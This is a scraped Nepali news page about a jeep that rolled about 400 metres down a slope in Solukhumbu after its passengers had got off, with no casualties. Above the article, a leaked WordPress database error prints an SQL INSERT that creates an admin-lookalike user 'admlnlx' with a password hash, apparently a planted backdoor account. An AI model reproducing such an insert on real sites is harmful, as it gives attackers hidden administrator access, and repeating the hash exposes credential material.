WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BohLYdxYOKO8hhRDro6XjcbpMHH5Pw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:04:27', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २० असार, सोलुखुम्बु । सोलुखुम्बुको थुलुङ दुधकोशी गाउँपालिका ८ दिप्लीघाटबाट यात्रु लिएर सल्लेरीतर्फ आउदै गरेको टाटा सुमो जीप देउसाको रणेममा दुर्घटना भएको छ ।
चालक सहित ९ जना यात्रु लिएर हिँडेको ना १ ज ४६३२ नम्बरको जीप रणेमस्थित लुर्फेम पहिरो उकालोमा ढुंगामा पछाडीको भाग ठोक्किएपछि यात्रु झारेर साईड लगाउने तयारी गरिएकोे जीप एक्कासी पछाडी गुड्दा सडकबाट करिब ४ सय मिटर तल झरेको हो ।
दुधकोशी नदी भन्दा करिब एक सय मिटर माथी क्षतिग्रस्त रुपमा जीप फेला परेको छ । जीपबाट यात्रु झरिसकेपछि दुर्घटना भएकाले मानवीय क्षति नभएको बताइएको छ ।
sourse:himshikharnews
https://gaulenews.com/?p=47027